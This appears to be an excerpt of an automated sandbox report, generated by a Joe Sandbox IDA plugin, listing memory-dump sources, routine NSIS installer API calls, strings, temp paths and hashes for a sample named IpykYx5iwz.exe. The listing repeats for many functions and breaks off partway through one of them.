                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: ec317d6961eb5a40142d6124600cd79e05fcd104c94089ce05635f40ddb41806
                                                  • Instruction ID: 0be634766171be457783ff79a9756eb1f19897d62519dac9fb9e1121949108d1
                                                  • Opcode Fuzzy Hash: ec317d6961eb5a40142d6124600cd79e05fcd104c94089ce05635f40ddb41806
                                                  • Instruction Fuzzy Hash: E0015672505244AFE7016B70AE49B9A3FFCEB55305F148839F141BA2F3C7B405058BAD
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                  • wsprintfA.USER32 ref: 00402D2C
                                                  • SetWindowTextA.USER32(?,?), ref: 00402D3C
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: d3a9d30f302aba9d5f1f3cb283cc925375bf2961cd4d7741ae71dd4627f18e8c
                                                  • Instruction ID: d8b1f7c19252c76547d0ac26773f92b51ee34845b2b999cc677ac46ee6bff0cf
                                                  • Opcode Fuzzy Hash: d3a9d30f302aba9d5f1f3cb283cc925375bf2961cd4d7741ae71dd4627f18e8c
                                                  • Instruction Fuzzy Hash: 75F01D7150020DABEF206F50DE1ABAE3669EB04345F00803AFA06B51D0DBB89D568B99
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                  • GlobalFree.KERNEL32(?), ref: 0040284C
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 41f61d2aad339b9bb2ff121ff6e715b3c55d7bfcc8d873eefeecb9c7bcb2b76b
                                                  • Instruction ID: 81d5057223690197c1e699a61141c161be386b669f751160d25d8bfdf59f5f06
                                                  • Opcode Fuzzy Hash: 41f61d2aad339b9bb2ff121ff6e715b3c55d7bfcc8d873eefeecb9c7bcb2b76b
                                                  • Instruction Fuzzy Hash: 17214A72C00224ABDF217FA58D49DAE7F79EF05364B10823AF520762E1CB7949428F98
                                                  APIs
                                                  • lstrlenA.KERNEL32(helsidesannoncen: Installing,helsidesannoncen: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
                                                  • wsprintfA.USER32 ref: 00404ABE
                                                  • SetDlgItemTextA.USER32(?,helsidesannoncen: Installing), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$helsidesannoncen: Installing
                                                  • API String ID: 3540041739-234470379
                                                  • Opcode ID: 69e60dc288c2aae71eae8495adc4475713b7f0031b27455c4aed30d6fedd597e
                                                  • Instruction ID: 283b724f563733faa375caf007583819479a8bdae971eeac84f96503b42fc0b0
                                                  • Opcode Fuzzy Hash: 69e60dc288c2aae71eae8495adc4475713b7f0031b27455c4aed30d6fedd597e
                                                  • Instruction Fuzzy Hash: B311E777A0412437DB0065B99C42EAF329CDB85334F250237FA26F61D1E9788C1286AC
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401D58
                                                  • GetClientRect.USER32(?,?), ref: 00401D9F
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                  • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: dfcfee733441120872404f1362752f9737f9264160297f8557c304d9fc30a6ce
                                                  • Instruction ID: 4e2990ac6a4ffc21ac5b981bdbb81ef568083f955646f0f466aa61fc58f6164b
                                                  • Opcode Fuzzy Hash: dfcfee733441120872404f1362752f9737f9264160297f8557c304d9fc30a6ce
                                                  • Instruction Fuzzy Hash: E5215172E00109AFDB05DF98DE44AEEBBB9FB48300F11413AF955F62A1CB789941CB58
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
                                                  • Instruction ID: 4dd2caf9872ce2c472bdea934ff98caf8c51944457e5ccf01e556c8d58d08a81
                                                  • Opcode Fuzzy Hash: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
                                                  • Instruction Fuzzy Hash: DF216BB1944208BEEF06AFA4D98AAAD7FB5EF84304F10457EF501B61D1C7B88640DB18
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403371,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00405ADF
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403371,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00405AE8
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405AF9
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AD9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                  • Instruction ID: fd1ad9f6dcd714b8658ec893e153b4722c010677cf0d3a214713980260d8cc5f
                                                  • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                  • Instruction Fuzzy Hash: 38D023B2601930BAD20177155D09DCF590D8F033407060037F100B62E2CB7C0D1147FD
                                                  APIs
                                                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,?,00405BDE,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
                                                  • CharNextA.USER32(00000000), ref: 00405B85
                                                  • CharNextA.USER32(00000000), ref: 00405B99
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 00405B73
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
                                                  • API String ID: 3213498283-2847000489
                                                  • Opcode ID: 004fc1c2ce2bb0b6fc58f47b15acfd4bce5f7aaa34e7cd5c8c8eaaa68dd96ba0
                                                  • Instruction ID: 2247cc7d81e988e78f7fba759403175a3c921c0d4e439e116ee2670e70ad05bf
                                                  • Opcode Fuzzy Hash: 004fc1c2ce2bb0b6fc58f47b15acfd4bce5f7aaa34e7cd5c8c8eaaa68dd96ba0
                                                  • Instruction Fuzzy Hash: 62F06251905F946BFB2292290C44B7B7FA8CB55751F1440B7D641B62C286BC78408F9A
                                                  APIs
                                                  • CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
                                                  • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 004038A2
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403871
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
                                                  • API String ID: 2962429428-2423888734
                                                  • Opcode ID: a4c6a579f0772344a9a2a3336061ec44cd3ccb1160300cadaff394e364a80da6
                                                  • Instruction ID: 07b74b36f59eaba180cbc95ad97f7473792aac15869385964b078aebb90d4677
                                                  • Opcode Fuzzy Hash: a4c6a579f0772344a9a2a3336061ec44cd3ccb1160300cadaff394e364a80da6
                                                  • Instruction Fuzzy Hash: B5E04F3150071896C5247F78BD494853B595B413357248776F078B20F0C73899564AA9
                                                  APIs
                                                    • Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E
                                                    • Part of subcall function 00405B72: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,?,00405BDE,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B85
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B99
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405C1A
                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 00405C2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
                                                  • API String ID: 3248276644-2847000489
                                                  • Opcode ID: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
                                                  • Instruction ID: f44c27dbebaf7467ddcf3faaec1fa70c7ffebf3acca808db2791febee6a049cb
                                                  • Opcode Fuzzy Hash: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
                                                  • Instruction Fuzzy Hash: 04F02D3510CE5016DA22333A1C06AAF6654CE8332871D013BFC52752D2CB3CA4529D7D
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040520B
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 0040525C
                                                    • Part of subcall function 0040421B: SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 0040422D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
                                                  • Instruction ID: ea2b2a229446d05cd35f1ac4721927dc1f932898565a27d058a062da5ba1ec36
                                                  • Opcode Fuzzy Hash: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
                                                  • Instruction Fuzzy Hash: 8E017131200608ABEF215F51ED84A5B3A6AFF84354F54447BFA00762E1C739AC529E5A
                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405809
                                                  • CloseHandle.KERNEL32(?), ref: 00405816
                                                  Strings
                                                  • Error launching installer, xrefs: 004057F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction ID: ab941a05c4999c1485253c76fd5e070cef9538b2f1a85a786da17f0f1360f2f3
                                                  • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction Fuzzy Hash: 6FE04FF06002097FEB00AF60EE49F7B77ACEB10704F808431BD00F2150D67898548A7C
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405B26
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405B34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
